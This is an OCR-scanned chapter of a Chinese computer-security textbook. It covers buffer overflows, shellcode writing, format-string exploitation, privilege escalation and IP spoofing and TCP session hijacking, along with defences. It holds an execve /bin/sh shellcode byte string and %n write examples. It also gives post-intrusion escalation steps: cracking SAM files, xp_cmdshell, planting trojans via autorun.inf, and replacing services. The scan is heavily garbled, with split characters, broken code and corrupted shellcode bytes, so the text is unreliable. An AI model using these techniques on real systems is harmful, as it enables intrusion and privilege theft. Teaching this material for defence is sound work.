缓冲 区 溢出 的 根本 原因 来 自 C 语言 (以 及 其 后 代 C++ ) 本 质 的 不 安全 性 : 数组 和 指针 
的 引用 没有 边界 来 检查 ;标准 C 库 中 还 存在 许多 非 安全 字符 串 操 作 , 如 strcpy() 、sprintf() 
和 gets() 等 。 下 面 的 程序 是 一 个 缓冲 区 溢出 的 实例 。 


# include <stdio.h> 

int main(){ 

char name[ 5]; 

printf ("Please input your name:"); 

gets (name); 

printf ("you are % s",name); 

} 

运行 这 个 程序 可 以 发 现 , 当 输 入 的 字符 数 少 时 ,程序 运行 正常 ; 当 输 入 的 字符 数 太 多 时 
(超过 8 个 ) ,程序 就 不 能 正常 结束 。 这 种 情况 即 由 缓冲 区 溢出 所 造成 。 

任何 一 个 源 程序 通常 都 包括 代码 段 和 数据 段 , 这 些 代码 和 数据 本 身 都 是 静态 的 。 为 了 
运行 程序 ,首先 要 由 操作 系统 负责 为 其 创建 进程 ,并 在 进程 的 虚拟 地 址 空间 中 为 其 代码 段 和 
数据 段 建立 映射 ,以 及 进程 在 运行 过 程 中 的 动态 环境 。 一 般 来 说 ,默认 的 动态 存储 环境 通过 
堆栈 (简称 栈 ) 机 制 建立 。 

逻辑 上 进程 的 堆栈 是 由 多 个 堆栈 帧 构成 的 ,其 中 每 个 堆栈 帧 都 对 应 一 个 函数 调用 。 当 
函数 调用 发 生 时 ,新 的 堆栈 帧 被 压 入 堆栈 ; 当 函 数 返回 时 ,相应 的 堆栈 帧 从 堆栈 中 弹出 。 由 
于 将 函数 返回 地 址 这 样 的 重要 数据 保存 在 程序 员 可 见 的 堆栈 中 , 当 程 序 写 入 超过 缓冲 区 的 
边界 时 ,就 会 覆盖 下 一 个 相 邻 的 内 存 块 ,导致 "缓冲 区 溢出 ,产生 一 些 不 可 预料 的 结果 : 也 
许 程序 可 以 继续 ,也许 程序 的 执行 出 现 奇怪 现象 ,也 许 程序 完全 失败 。 

典型 的 堆栈 帧 结构 如 图 8. 6 所 示 。 堆 栈 中 存放 的 是 与 每 个 函数 对 应 的 堆栈 帧 。 当 函数 
调用 发 生 时 ,新 的 堆栈 帧 被 压 入 堆栈 ; 当 函 数 返回 时 ,相应 的 堆栈 帧 从 堆栈 中 弹出 。 

堆栈 帧 的 顶部 为 函数 的 实 参 ,下 面 是 函数 的 返回 地 址 以 及 前 一 个 堆栈 帧 的 指针 ,最 下 面 
是 分 配给 函数 的 局 部 变量 使 用 的 空间 。 一 个 堆栈 帧 通常 都 有 两 个 指针 ,其 中 一 个 称 为 堆栈 
帧 指针 , 另 一 个 称 为 栈 顶 指针 。 前 者 所 指向 的 位 置 是 固定 的 ,而 后 者 所 指向 的 位 置 在 函数 的 
运行 过 程 中 可 变 。 因 此 ,在 函数 中 访问 实 参 和 局 部 变量 时 都 是 以 堆栈 帧 指针 为 基 址 ,再 加 上 
一 个 偏 移 。 由 图 8.6 可 知 , 实 参 的 偏 移 为 正 , 局 部 变量 的 偏 移 为 负 。 当 发 生 数据 栈 溢出 时 ， 
多 余 的 内 容 就 会 越过 栈 底 ,覆盖 栈 底 后 面 的 内 容 。 通 常 ,与 栈 底 相 邻 的 内 存 空间 中 存放 着 程 
序 返 回 地 址 。 因 此 ,数据 栈 的 溢出 会 覆盖 程序 的 返回 地 址 ,从 而 造成 程序 返回 时 取 到 一 个 错 
误 地 址 而 产生 错误 。 

C 语言 把 边界 检查 这 一 艰巨 任务 交 给 了 开发 人 员 ,要求 编写 安全 的 程序 。 然 而 这 一 要 
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求 往往 被 程序 员 忽 视 , 从 而 给 黑客 可 乘 之 机 。 


1 Argument n 
仿 : 函数 的 实 参 
移 Argument 1 
如 Remaddress | 恢复 前 一 个 堆 
Previous frame pointer sl 
堆栈 指针 Local variable 1 
偏 Local variable 2 
别 | | Local variable 3 。 | /函数 的 局 部 变量 
负 
栈 顶 指针 1 Local variable n 


图 8.6 典型 的 堆栈 指针 


3. 缓冲 区 溢出 攻击 

如 果 当 发 生 缓冲 区 溢出 时 能 够 准确 地 控制 跳 转 地 址 ,将 程序 流程 引 向 预定 的 地 址 ， 
CPU 就 会 去 执行 这 个 指令 。 如 果 和 人 侵 者 在 预定 的 地 址 中 放置 代码 用 于 产生 一 个 Shell, 则 
当 程序 被 溢出 时 ,入 侵 者 将 获得 一 个 Shell。 该 Shell 会 继承 被 洲 出 程序 的 权限 。 如 果 入 侵 
者 获得 了 某 台 服务 器 的 一 个 普通 权限 账号 ,而 服务 器 上 某 个 以 root 或 system 权限 运行 的 
程序 存在 缓冲 区 溢出 漏洞 ,入 侵 者 就 可 以 利用 该 漏洞 生成 的 Shell 去 获得 root 权限 。 而 入 
侵 者 进行 攻击 的 关键 是 修改 以 较 高 权限 运行 的 程序 跳 转 指令 的 地 址 。 

入 侵 者 为 了 修改 以 较 高 权限 运行 的 程序 跳 转 指令 的 地 址 ,一 般 要 经 过 如 下 三 步 。 

(1) 将 需要 执行 的 代码 放 到 目标 系统 的 内 存 。 下 面 是 两 种 常用 方法 : 四 植 和 人 法 。 通 过 
主机 ,将 需要 执行 的 代码 (目标 平台 上 可 执行 的 ) 直 接 放 到 缓冲 区 。@ 利 用 已 有 的 代码 。 只 
要 修改 传人 参数 。 

(2) 修改 返回 地 址 。 

(3) 控制 程序 跳 转 ,改变 程序 流程 。 下 面 是 三 种 常用 方法 。@ 修 改 程序 返回 地 址 。 将 
预先 设 定好 的 地 址 替换 程序 原来 的 返回 地 址 。@ 在 缓冲 区 附近 放 一 个 函数 指针 ,指向 人 侵 
者 定义 的 指令 。 回 使 用 long jmp。C 语言 的 set jmp/long jmp 是 一 个 检验 /恢复 系统 ,可 以 
在 检验 点 设 定 set jmp(buffer) ,用 long jmp(buffer) 恢 复 检 验 点 。 入 侵 者 可 以 利用 long jmp 
(buffer) 跳 转 到 预定 代码 。 

例如 函数 : 

D>int main (int argc, char **argv) 

{ 

@—>char buf [80]; 
@> strcpy (buf, argv[1]); 

@™} 

@-~ 

由 于 gets strcpy 等 函数 没有 对 数组 越界 加 以 判断 和 控制 ,在 上 面 程序 中 读 入 的 argv 
如 果 超 过 局 部 变量 buf 的 声明 大 小 80 时 ,堆栈 中 保存 的 寄存 器 的 值 甚至 返回 地 址 EIP 就 会 
被 覆盖 ,如 图 8. 7 所 示 。 
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堆栈 指针 ESP 一 | 


BSP 一 一 | 


步骤 @@ 寄 存 器 压 栈 ， 分 配 局 部 变量 buf 的 缓冲 


ESP 一 一 一 | 


步骤 @ 退 出 ， 返 回 EIP 所 指 地 址 


写 一 个 溢出 攻击 测试 程序 需要 以 下 步骤 ; 


堆栈 ESS : ESP 


步骤 DD 调用 函数 之 前 


堆栈 ESS : ESP 


缓冲 


风 


寄存 器 


EIP( 返 回 地 址 ) 


argc 


argv 


堆栈 ESS : ESP 


Argv[1] 


寄存 器 


EIP( 返 回 地 址 ) 


argc 


argv 


(1) 发 现 并 确定 漏洞 程序 的 溢出 点 。 
(2) 找到 jmp esp 指令 地 址 。 
(3) 编写 并 优化 shellcode 程序 代码 (C 或 Asm) ,如 果 有 必要 ,应 在 shellcode 头 部 加 上 


编 / 解 码 程 序 。 
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堆栈 ESS : ESP 
低 低 
ESP 一 | 
EIP( 返 加 地址) 
argc 
高 EY 高 
步骤 @ 调 用 main()， 将 参数 argc, argv 和 EIP 压 栈 
堆栈 ESS : ESP 
低 ESP 一 -| 低 
Argv[1] 
寄存 器 
EIP( 返 回 地 址 ) 
argc 
高 argv 高 
步骤 图 读 和 buf 数据 
堆栈 ESS : ESP 
低 ESP 一 =| 低 
Argv[1] 
argc 
高 argv 高 
参数 超出 局 部 变量 的 buf 
图 8.7 堆栈 ESP 


(4) 调试 ,测试 代码 有 效 性 ,公布 代码 (如 果 不 是 很 危险 ,否则 可 能 会 触犯 法 律 )。 


4. shellcode 常用 


的 编写 方法 


shellcode 常用 的 编写 方法 有 两 种 : 一 种 是 使 用 汇编 语言 编写 ,用 汇编 编译 器 编译 后 得 
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到 二 进 制 代码 ;另外 一 种 是 在 C 语言 中 嵌入 汇编 语言 ,使 用 C 语言 编译 器 编译 ,然后 从 编译 
过 的 可 执行 文件 中 提取 二 进 制 可 执行 代码 ,得 到 shellcode。 后 一 种 编写 方法 使 用 比较 
屋 : 汪 

例如 Windows 的 shellcode, 需 插入 具有 管理 员 权 限 的 进程 ,代码 如 下 : 


#include<process.h> 
void main (void) 
{ 
System("cmqd") 7 
} 


Linux 的 shellcode 代码 如 下 : 


#include < stdio.h> 

void main () 

{ 

Char * name;2]; 

name [0]="/bin/sh"; 

name [1]=NULL; 

execve (name [0] , name, NULL); 
exit (0); 

} 

把 上 面 程序 编译 后 反 汇编 (gcc，gdb) ,得 到 串 : Char shellcode [ ]=="\xeb\xlf\x5e\ 
x89\x76\x08\x31\xcO\x88\x46\x07\x89\x46\x0c\xbO\xOb""\x89\xf3\x8d\x4e\x08\x8d 
\x56\xOc\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/sh"。 

利用 Strcpy(buff，shellcode) 把 EIP 的 值 设 为 shellcode 的 起 点 , 设 将 要 复制 到 buff 中 
的 字符 串 为 SS…SSS00…000A00…00, 或 调整 为 NN…NSSS…SSSSAAAA…AA (为 提高 
命中 率 ), 其 中 S 为 shellcode,A 为 shellcode 在 内 存 中 的 地 址 。 在 缓冲 区 中 写 入 执行 后 可 以 
运行 shell 的 二 进 制 机 器 码 shellcode, 其 他 位 随意 设置 。 函 数 退出 的 时 候 就 会 返回 EIP' 作 
为 返回 地 址 ,然后 继续 执行 shellcode,shellcode 又 打开 了 一 个 shell, 由 于 程序 设置 了 suid 
位 ,所 以 打开 的 shell 就 是 root shell, 系 统 的 root 权限 就 得 到 了 ,如 图 8. 8 所 示 。 


堆栈 ESS : ESP 堆栈 ESS : ESP 
ESP 一 -| 低 ESP_ | 低 
缓冲 区 shellcode 
寄存 器 0x0000 
EIP( 返 回 地 址 ) EIP' 
argc argc 
argv 高 argv 高 


图 8.8 shellcode 


Windows 下 常常 利用 IIS 的 缓冲 区 溢出 漏洞 .使 用 同样 的 原理 ,构造 一 个 超 长 的 http 


第 8 章 医治 


请 求 , 有 漏洞 的 IIS 不 对 其 长 度 进行 判断 ,而 直接 把 全 部 字符 送 给 相应 的 dll 程序 。 攻 击 者 
通过 履 盖 EIP, 重 定向 到 自己 的 shellcode 中 去 ,从 而 执行 任意 命令 。 

5. 缓冲 区 溢出 防御 措施 

1) 安装 安全 补丁 。 

2) 编写 安全 的 代码 。 缓 冲 区 溢出 攻击 的 根源 在 于 编写 程序 的 机 制 ,因此 防范 缓冲 区 溢 
出 漏洞 首先 应 该 确保 程序 (包括 系统 软件 和 应 用 软件 ) 代 码 的 正确 性 ,避免 程序 中 有 不 检查 
变量 、 缓 冲 区 大 小 及 边界 等 情况 存在 。 比 如 ,使 用 grep 工具 搜索 源 代码 中 容易 产生 漏洞 的 
库 调 用 ,检测 变量 的 大 小 、 数 组 的 边界 .对 指针 变量 进行 保护 ,以 及 使 用 具有 边界 .大 小 检测 
功能 的 C 编译 器 等 。 

3) 基于 一 定 的 安全 策略 设置 系统 。 通 过 设置 隐藏 或 混淆 操作 系统 的 版 本 信息 等 ,防止 
黑客 通过 某 些 设置 直接 或 间接 地 获取 控制 权 。 典 型 措施 如 下 : 

(1) 手工 改写 /etc/inetd. conf 文件 中 的 Telnet 设置 ,使 得 Telnet 远程 登录 的 用 户 无 法 
看 到 系统 的 提示 信息 。 具 体 设 置 为 : 


telnet stream tcp nowait root /usr/sbin/tcpd/in.telnetd -h 


末尾 加 上 -h 参数 可 以 让 守护 进程 不 显示 任何 系统 信息 ,只 显示 登录 提示 。 
(2) 改写 rc. local 文件 。 将 rc. local 文件 中 显示 Linux 发 行 版 本 的 名 字 、 版 本 号 、 内 核 
版 本 和 服务 器 名 称 等 信息 的 代码 注释 掉 , 在 显示 这 些 信息 的 代码 行 前 加 # ,如 


# echo "$R">> /etc/issue 


(3) 禁止 提供 finger 服务 。 

(4) 保护 堆栈 。 加 入 函数 建立 和 销毁 代码 。 前 者 在 函数 返回 地 址 后 增加 一 些 附加 字 
节 , 返 回 时 要 检查 这 些 字 节 有 无 改动 。 使 堆栈 不 可 执行 一 一 非 执行 缓冲 区 技术 ,使 人 侵 者 无 
法 利用 缓冲 区 溢出 漏洞 。 


8.3.3 格式 化 字符 串 攻击 


格式 化 字符 串 攻 击 也 称 为 格式 化 字符 串 漏洞 , 同 其 他 许多 安全 漏洞 一 样 是 由 于 程序 员 
的 疏漏 造成 的 。 不 过 ,这 种 下 漏 来 自 程序 员 使 用 格式 化 字符 串 函数 的 不 严谨 。 
1. 格式 化 字符 串 函 数 族 
ANSI C 定义 了 一 系列 的 格式 化 字符 串 函 数 ,如 : 
。 printf: 输出 到 一 个 stdout 流 。 
。 fprintf: 输出 到 一 个 文件 流 。 
。 sprintf: 输出 到 字符 串 。 
。 snprintf: 输出 到 字符 串 并 检查 长 度 。 
。 vprintf; 从 va_arg 结构 体 输出 到 一 个 stdout 流 。 
vfprintf: 从 va_arg 结构 体 输出 到 一 个 文件 流 。 
vsprintf: 从 va_arg 结构 体 输 出 到 一 个 字符 串 。 
vsnprintf: 从 va_arg 结构 体 输 出 到 一 个 字符 串 并 检查 长 度 。 
。 基于 上 面 这 些 函 数 的 复杂 函数 和 非 标准 函数 ,包括 setproctitle、syslog、err * 、verr x 、 


warm 和 * vwarm 等 。 
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这 些 函 数 有 一 个 共同 的 特点 ,就 是 都 要 使 用 一 个 格式 化 字符 串 。 例 如 printf 函数 的 前 
一 个 参数 就 是 格式 化 字符 串 。 

2. 格式 化 字符 串 漏洞 

为 了 说 明 对 格式 化 字符 串 使 用 不 当 而 产生 的 格式 化 字符 串 漏 洞 ,请 先 看 下 面 的 程序 。 


#include < stdio.h> 
int main() 
{ 
Char * name; 
gets (s); 
printf (s); 
} 


如 图 8. 9 所 示 是 该 函数 的 两 次 输入 运行 结果 。 
abcde 


abcde%08x, %08x, %008x 
000002e2, 0000ffe4, 0000011d 


图 8.9 实验 结果 


当 输 入 abcde 时 ,输出 仍然 是 abcde。 而 当 输 入 %08x,%08x,%08x 时 ,输出 的 却 是 
000002e2,0000fe4,0000011d。 这 就 是 格式 化 字符 串 漏洞 所 带 来 的 问题 。 

在 printf 函数 中 ,s 被 解释 成 了 格式 化 字符 串 。 当 调用 该 函数 时 ,首先 会 解析 格式 化 字 
符 串 ,一 次 取 一 个 字符 进行 分 析 : 如 果 字 符 不 是 % ,就 将 其 原样 输出 ; 若 字 符 是 %, 则 其 后 面 
的 字符 就 要 按照 格式 化 参数 进行 解析 。 当 输入 %08x,%08x,%08x 时 ,每 个 % 后 面 的 x 都 
被 解释 为 一 个 十 六 进 制 的 数据 项 。 但 函数 没有 这 样 三 个 数据 项 ,于 是 就 将 堆栈 中 从 当前 堆 
栈 指针 向 堆栈 底部 方向 的 三 个 地 址 的 内 容 按 十 六 进 制 输出 , 即 000002e2, 0000fe4， 
0000011d。 这 启发 人 们 使 用 % 访 问 到 一 个 非法 地 址 。 

3. 格式 化 字符 串 攻 击 的 几 种 形式 

1) 查看 内 存 堆 栈 指针 开始 的 一 些 地 址 的 内 容 。 使 用 类 似 于 printf ("%08x,%08x,% 
08x") ;的 语句 ,可 以 输出 当前 堆栈 指针 向 栈 底 方向 的 一 些 地 址 的 内 容 , 甚 至 可 以 是 超过 栈 
底 之 外 的 内 存 地 址 的 内 容 。 

2) 查看 内 存 任何 地 址 的 内 容 。 能 查看 指定 内 存 地 址 或 从 任何 一 个 地 址 开始 的 内 存 内 
容 。 例 如 语句 printf ("\x20\02\x85\x08_%08x,%08x,%08x"); 将 会 从 地 址 0x08850220 
开始 ,查看 连续 三 个 地 址 的 内 容 。 

3) 修改 内 存 任何 地 址 的 内 容 。 格 式 化 字符 串 函 数 还 可 以 使 用 一 个 格式 字符 %n 将 已 
经 打印 的 字 节 数 写 人 一 个 变量 。 利 用 这 一 点 ,很 容易 改变 某 个 内 存 变 量 的 值 。 例 如 程序 : 

#include< stdio.h> 

int main() 


{ 
int i=5; 


printf ("%108usn\t", 1, (int * )&i);printf ("i=%d\n", i); 
printf ("%58s123%n\t", "", gi) ;print ("i=%d\n", i); 


一 330 


第 8 章 医 浊 


程序 执行 结果 如 图 8. 10 所 示 。 
0 


图 8.10 运行 结果 


语句 printf("%108u%n\t",1,(int* ) &i) ;用 数据 1 的 宽度 设 为 108 来 修改 变量 i 的 
值 。 而 语句 printf("%58s123%n\t","&i"); 是 用 字符 串 “” 加 上 字符 串 “123” 的 存放 宽度 ， 
即 23 十 3 来 修改 变量 i 的 值 。 使 用 同样 的 办 法 ,可 以 向 进程 空间 中 的 任意 地 方 写 一 个 字 节 ， 
以 达到 下 面 的 目的 : 

(1) 通过 修改 关键 内 存 地 址 内 容 ,实现 对 程序 流程 的 控制 ; 

(2) 覆盖 一 个 程序 储存 的 UID 值 ,以 降低 和 提升 特权 ; 

(3) 覆盖 一 个 执行 命令 ; 

(4) 覆盖 一 个 返回 地 址 ,将 其 重 定向 到 包含 shellcode 的 缓冲 区 中 。 


8.4 权限 提升 


权限 提升 是 发 生 在 入 侵 成 功 之 后 ,但 入 侵 得 到 的 用 户 没有 管理 员 权 限 ,操作 受 到 系统 的 
限制 。 因 此 ,取得 系统 的 一 般 账 户 后 ,黑客 需要 将 一 般 账 号 置换 或 提升 为 管理 员 账 号 ,获得 
系统 的 完全 访问 权限 。 

获取 管理 员 账 号 和 密码 以 提升 权限 的 方法 如 下 : 

(1) 社会 工程 学 。 猜 或 骗取 账号 ; 翻 看 管理 员 邮 件 或 其 他 系统 账号 。 

(2) 本 地 溢出 。 利 用 操作 系统 漏洞 运行 相关 软件 溢出 ,如 PipeUpAdmin. exe。 

(3) 利用 scripts 目录 的 可 执行 权限 。 如 IIS 下 的 运行 目录 ,在 IE 中 输入 http:// 
targetIP/Scripts/ 木 马 文件 名 . exe。 

(4) 破解 操作 系统 的 密码 存储 文件 。 如 C:\Windows\system32\config\ 下 的 SAM 文 
件 中 的 账号 密码 。 

权限 提升 的 具体 措施 如 下 : 

(1) 替换 系统 服务 。 在 获得 的 guest 权限 的 shell 输入 net start 命令 ,查看 目标 机 器 所 
运行 的 服务 ;替换 第 三 方 服 务 ( 因 系统 服务 有 保护 ) ;替换 无 保护 的 系统 服务 (可 写 盘 ) 。 

(2) 替换 管理 员 常 用 应 用 程序 ,如 QQ FTP。 

(3) 利用 autorun. inf 和 desktop. ini, 修 改 文件 ,加载 木马 。 

(4) FTP 服务 器 提 权 。 如 对 ServerU ,用 自己 的 ServerUDaemon. ini 替换 系统 的 ,重启 
SU; 或 映射 ServerU 的 43958 到 另 一 端口 Fpipe - v - 13333 - r 43958 127.0.0.1, 在 控 
制 端 安装 ServerU 配置 对 方 IP 连接 后 查看 其 管理 员 账 号 密码 ;ServerU 溢出 提 权 。 

(5) 利用 SQL 账户 密码 提 权 。 如 利用 XP 中 数据 库 的 xp_cmdshell 方法 ;或 使 用 注入 
工具 Sqlexec. exe, 在 host 一 栏 中 填 人 对 方 IP,User 与 Pass 中 填 人 所 得 到 的 用 户 名 与 密码 ， 
format 选择 xp_cmdshell" %s" 即 可 ,然后 单 击 connect, 进 入 CMD shell。 

开始 菜单 \ 程 序 \ 启 动 写 入 bat ,vbs 等 木马 。 
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(1) 利用 Csript。 运 行 cscript C:\Inetpub\AdminScripts\adsutil. vbs get w3svc/ 
inprocessisapiapps 查看 有 特权 的 dll 文件 ,加 入 asp. dll 或 上 传 木马 文件 并 执行 。 

(2) 利用 $ IPC 空 链接 和 DOS 网 络 命令 。 

(3) 利用 NC 工具 ,利用 远程 控制 软件 ,如 Pcanyware 等 。 


8.5 欺骗 类 攻击 


电子 欺骗 (Spoofing) 就 是 在 两 台 建 立 了 信任 关系 的 计算 机 之 间 冒 充 其 中 一 台 , 对 另 一 
台 进 行 欺骗 性 连接 ,而 后 对 其 发 起 攻击 。 这 种 欺骗 可 以 通过 不 同 的 网 络 协 议 漏洞 进行 。 电 
子 欺骗 分 为 IP 欺骗 .TCP 会 话 动 持 .ARP 欺骗 .DNS 欺骗 和 Web 欺骗 等 类 型 。 


8.5.1 IP 欺骗 


1. IP 欺骗 原理 

IP 欺骗 就 是 伪造 别 的 机 器 的 IP 地 址 用 于 欺骗 第 三 者 。 假 定 有 两 台 主 机 S 和 全 ,并且 
它们 之 间 已 经 建立 了 信任 关系 。 入 侵 者 X 要 对 本 进行 IP 欺骗 攻击 ,就 可 以 假冒 S 与 工 进 
行 通信 。 过 程 如 下 : 

(1) 确认 攻击 目标 。 

(2) 使 计划 要 冒充 的 主机 无 法 响应 目标 主机 的 会 话 。 

(3) 精确 地 猜测 来 自 目标 请 求 IP 数据 包 的 正确 序列 数 。 

(4) 冒充 受信 主机 连接 到 目标 主机 。 

(5) 根据 猜 出 的 正确 序列 号 向 目标 主机 发 送 回 应 IP 包 。 

(6) 进行 系列 会 话 。 

2. 确认 攻击 目标 

IP 欺骗 仅仅 能 对 一 些 特定 的 服务 进行 。 如 Sun RPC(Sun 远程 过 程 调 用 ) 的 网 络 设备 ， 
基于 IP 地 址 认证 的 任何 网 络 服务 ,提供 R 系列 (rlogin、rsh 和 rcp 等 ) 服 务 的 机 器 。 

3. 使 冒充 的 主机 无 法 响应 目标 主机 会 话 

当 X 要 伪造 S 的 IP 地 址 假冒 S 与 目标 主机 T 进行 通信 ,但 T 的 所 有 回应 信息 都 要 发 
回 到 S, 可 能 使 自己 的 攻击 露馅 。 因 此 ,X 一 定 要 先 设 法 使 S 瘫痪 ,无 法 响应 工 的 数据 报 文 。 
解决 办 法 是 对 其 实施 拒绝 服务 攻击 ,如 用 一 个 虚假 的 IP 地 址 向 S 主机 TCP 端口 发 送 大 量 
的 SYN 请 求 ,S 则 会 向 该 虚假 的 IP 地 址 发 送 响 应 ,得 到 的 是 该 机 不 可 到 达 的 消息 。 而 S 的 
TCP 会 认为 这 是 暂时 的 不 通 , 于 是 继续 尝试 连接 ,直到 确信 无 法 连接 ,不 过 这 已 经 为 黑客 进 
行 攻击 提供 了 充足 的 时 间 。 

4. 精确 猜测 正确 序列 数 

要 冒充 就 要 取得 被 攻击 目标 T 主机 的 信任 。TCP 是 可 靠 传 输 协议 ,发 送 的 报 文 都 分 配 
序列 编号 ,以 便 收 方 进行 报 文 装配 。 在 通过 三 次 握手 建立 TCP 连接 的 过 程 中 ,客户 端 首先 
要 向 服务 器 发 送 序列 号 z; 服 务 器 收 到 后 通过 确认 要 向 客户 端 送 回 期 待 的 序列 号 (z 十 1) 和 
自己 的 序列 号 。 由 于 序列 号 的 存在 ,给 IP 欺骗 攻击 增加 了 不 少 难度 ,要 求 攻击 者 X 必须 能 
够 精确 地 猜测 出 来 自 目标 机 的 序列 号 ,否则 也 会 露馅 。 

TCP 报 文 格式 如 图 8. 11 所 示 ,其 中 序列 号 的 编排 具有 一 定 的 规律 。TCP 序列 号 由 32 
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位 的 字段 提供 ,其 值 为 0 一 22 一 1, 并 且 每 一 个 TCP 连接 交换 的 数据 都 是 顺序 编号 的 。 初 始 
的 TCP 序列 号 并 不 是 0, 而 是 由 tcp_init 函数 确定 的 ,可 以 说 是 一 个 随机 数 ,并 且 它 每 秒 增 
加 128 000。 在 没有 连接 的 情况 下 ,TCP 的 序列 号 每 9. 32 小 时 会 复位 一 次 ;而 有 连接 时 ,每 
次 连接 把 TCP 序列 号 增加 64000。 因 此 需 估计 本 机 与 可 信服 务 器 之 间 的 往返 时 间 (RTT)， 
在 没有 连接 时 ,TCP 序列 号 为 128 000 * RTT; 如 果 目 标 服务 器 刚刚 建立 过 一 个 连接 ,还 要 
加 上 64 000。 


0 15 16 31 
源 端口 目的 端口 
序号 
确认 号 
数据 偏 移 | 保留 6 个 控制 位 窗口 
校 验 和 紧急 指 和 
选项 填充 
数据 


图 8.11 TCP 报 文 格式 


5. 冒充 受信 主机 连接 到 目标 主机 

实际 获得 IP 数据 包 的 序列 记录 有 4 种 情况 ,连接 也 有 4 种 情况 

(1) 估计 的 序列 号 是 准确 的 ,进入 的 数据 包 将 被 放置 在 接收 缓冲 区 供 使 用 。 

(2) 估计 的 序列 号 小 于 期 待 的 数字 ,数据 包 被 放弃 。 

(3) 估计 的 序列 号 大 于 期 待 的 数字 , 且 在 滑动 窗口 之 内 ,被 认为 是 一 个 未 来 的 数据 包 ， 
TCP 将 等 待 中 间 缺 少 的 数据 。 

(4) 估计 的 序列 号 大 于 期 待 的 数字 ,但 不 在 滑动 窗口 之 内 ,被 放弃 ,并 返回 一 个 期 待 的 
数据 序列 号 。 

实际 获得 目标 主机 发 送 IP 数据 包 的 序列 记录 步骤 如 下 : 

(1) 请 求 连接 目标 主机 ; 

(2) 目标 主机 送 回 带 序列 号 的 回应 ; 

(3) 记录 序列 号 并 断 开 连接 ; 

(4) 调整 序列 号 重新 连接 请 求 。 

6. IP 欺骗 的 防范 策略 

(1) 放弃 基于 IP 地 址 的 信任 策略 。IP 欺骗 是 基于 IP 地 址 信任 的 ,而 IP 地 址 很 容易 伪 
造 。 因 此 ,阻止 这 类 攻击 的 一 种 非常 简单 的 方法 是 放弃 以 IP 地 址 为 基础 的 验证 。 例 如 ,不 
允许 rx 类 远程 调用 命令 的 使 用 、 删 除 . rhost 文件 ,清空 /etc/hosts. eauiv 文件 等 ,迫使 所 有 
的 用 户 使 用 其 他 远程 通信 手段 (如 Telnet、SSH 等 )。 

(2) 使 用 随机 化 的 初始 序列 号 。 序 列 号 是 接收 方 TCP 进行 合法 检查 的 一 个 重要 依据 ， 
序列 号 有 一 定 的 选择 和 增加 规律 ,是 黑客 IP 欺骗 攻击 能 够 得 偿 的 一 个 重要 因素 。 为 了 让 黑 
客 无 法 计算 或 猜测 出 序列 号 ,Bellovin 提出 了 一 个 计算 公式 : 

ISN = M+F(localhost, localport, remotehost, remoteport) 

其 中 ,M 为 4 微 秒 定时 器 ,F 为 加 密 Hash 函数 ,localhost 为 本 地 主机 ,localport 为 本 地 

端口 ,remotehost 为 远方 主机 ,remoteport 为 远方 端口 。Bellovin 建议 下 是 一 个 结合 连接 标 


333| 


客 


《计算 机 系统 安全 》 EE 于 是 3 


识 符 和 特殊 矢量 的 Hash 函数 , 它 产生 的 序列 号 不 能 通过 计算 或 猜测 得 出 。 

(3) 在 路 由 器 中 加 上 一 些 过 滤 条 件 。 如 不 允许 声称 是 内 部 包 的 外 部 包 ( 源 地 址 和 目标 
地 址 都 是 本 地 域 地 址 ) 进 入 ,防止 外 部 攻击 者 假冒 内 部 主机 的 IP 欺骗 ;禁止 带 有 内 部 资源 地 
址 的 内 部 包 出 去 ,防止 内 部 用 户 对 外 部 站 点 的 攻击 。 当 然 ,对 处 于 同一 子 网 络 , 或 假借 外 部 
信任 主机 的 攻击 ,这 一 措施 是 无 效 的 。 

(4) 配置 服务 器 ,尽量 减少 易 受 IP 欺骗 攻击 的 服务 启动 ,降低 IP 欺骗 的 可 能 。 

(5) 使 用 防火 墙 和 其 他 抗 IP 欺骗 的 产品 。 


8.5.2 TCP 会 话 动 持 


1. TCP 会 话 劫持 攻击 原理 

会 话 劫持 (Session Hijack) 与 IP 欺骗 有 点 相似 。 假 设 A、B、C 是 一 个 网 段 上 的 三 台 主 
机 ,其 中 BB 是 被 入 侵 者 控制 主机 ,A、C 是 两 台 正 在 会 话 的 主机 。 由 于 三 台 主 机 在 一 个 (以 
太 ) 网 段 上 ,因此 B 能 收 到 A 与 C 的 所 有 数据 包 。 

如 果 当 A 正 等 待 C 的 数据 包 时 ,B 抢先 给 A 一 个 伪造 的 数据 包 ,A 就 会 对 这 个 数据 包 
进行 回应 ,B 也 再 次 响应 。 当 C 的 真正 数据 包 传送 到 A 时 ,由 于 A 所 期 待 的 序列 号 已 经 变 
化 而 不 再 认识 C 的 数据 包 , 遂 将 之 丢弃 ,继续 同 B( 冒 充 A) 会 话 。 

C 无 法 与 A 进行 会 话 , 却 不 知道 问题 所 在 ,会 误 认 为 K 数据 报 文 是 网 络 一 时 故障 ,于 是 
不 停 地 向 A 发 送 ACK 数据 报 文 ,试图 重 传 。 而 A 却 不 断 地 将 这 些 数据 报 文 丢 弃 。 这 样 不 
停 地 重复 ,就 会 产生 ACK“ 风 暴 ”。 

这 是 一 种 结合 了 嗅 探 以 及 欺骗 技术 在 内 的 攻击 手段 。 广 义 上 说 ,会 话 支持 就 是 在 一 次 
正常 的 通信 过 程 中 ,黑客 作为 第 三 方 参与 到 其 中 ,或 者 是 在 数据 流 ( 例 如 基于 TCP 的 会 话 ) 
里 注射 额外 的 信息 ,或 者 是 将 双方 的 通信 模式 暗中 改变 , 即 从 直接 联系 变 成 与 黑客 联系 。 

2，TCP 会 话 劫持 原因 

造成 TCP 会 话 劫持 的 原因 有 两 点 : 

(1) 网 络 以 传统 的 以 太 网 共享 方式 工作 ,每 一 个 节点 都 可 以 接收 到 其 他 节点 之 间 的 
通信 。 

(2) 主机 只 在 连接 时 进行 一 次 IP 地 址 的 验证 。 

在 TCP 连接 的 过 程 中 ,TCP 程序 只 跟踪 序列 号 ,而 不 检查 MAC 地 址 。 所 以 一 旦 有 
MAC 地 址 发 生变 化 (入 侵 者 冒充 信任 者 ) ,计算 机 不 会 发 现 。 

因此 ,入 侵 者 通过 了 解 目 标 主机 产生 序列 号 的 方式 ,猜测 出 SYN/ACK 包 中 的 序列 号 ， 
就 可 以 冒充 受信 计算 机 与 目标 主机 进行 通话 。 

3. 会 话 动 持 攻击 工具 

(1) Juggernaut。 可 以 被 用 来 进行 TCP 会 话 攻击 的 网 络 sniffer, 运 行 于 Linux 操作 系 
